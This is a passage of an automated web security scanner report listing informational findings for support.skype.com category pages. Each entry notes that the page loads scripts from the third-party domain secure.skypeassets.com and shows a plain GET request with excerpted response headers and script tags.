<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.446. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_MAC_OS_X/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_MAC_OS_X/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 56496


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.447. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_NOKIA_N800N810/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_NOKIA_N800N810/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:00 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50289


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.448. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_NOKIA_N900/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_NOKIA_N900/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:59 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48832


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.449. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_SYMBIAN/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_SYMBIAN/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:35 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52607


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.450. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_WEBOS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_WEBOS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48305


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.451. https://support.skype.com/en-us/category/SKYPE_LITE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_LITE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_LITE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50458


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.452. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_MANAGER_FOR_MEMBERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47724


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.453. https://support.skype.com/en-us/category/SKYPE_ME/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ME/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_ME/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:31 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50049


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.454. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_MOBILE_FOR_VERIZON/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_MOBILE_FOR_VERIZON/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:36 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53645


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.455. https://support.skype.com/en-us/category/SKYPE_ON_AU/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_AU/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_ON_AU/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:37 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53353


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.456. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_TELUS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_ON_TELUS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:56 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49395


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.457. https://support.skype.com/en-us/category/SKYPE_ON_THREE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_THREE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_ON_THREE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:35 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51355


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.458. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_YOUR_TV/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_ON_YOUR_TV/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53773


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.459. https://support.skype.com/en-us/category/SKYPE_PRIME/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_PRIME/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_PRIME/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:31 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50057


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.460. https://support.skype.com/en-us/category/SKYPE_PRO/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_PRO/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_PRO/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:32 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50434


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.461. https://support.skype.com/en-us/category/SKYPE_SMS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_SMS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_SMS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:06 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49270


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.462. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_TOOLBARS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_TOOLBARS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51162


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.463. https://support.skype.com/en-us/category/SKYPE_TO_GO/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_TO_GO/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_TO_GO/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 55303


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.464. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_ACCOUNT_DETAILS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SM_ACCOUNT_DETAILS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48679


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.465. https://support.skype.com/en-us/category/SM_FEATURES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_FEATURES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SM_FEATURES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:05 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51517


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.466. https://support.skype.com/en-us/category/SM_GETTING_STARTED/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_GETTING_STARTED/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SM_GETTING_STARTED/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50336


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.467. https://support.skype.com/en-us/category/SM_MEMBERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_MEMBERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SM_MEMBERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:04 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51383


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.468. https://support.skype.com/en-us/category/SM_PAYMENTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_PAYMENTS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

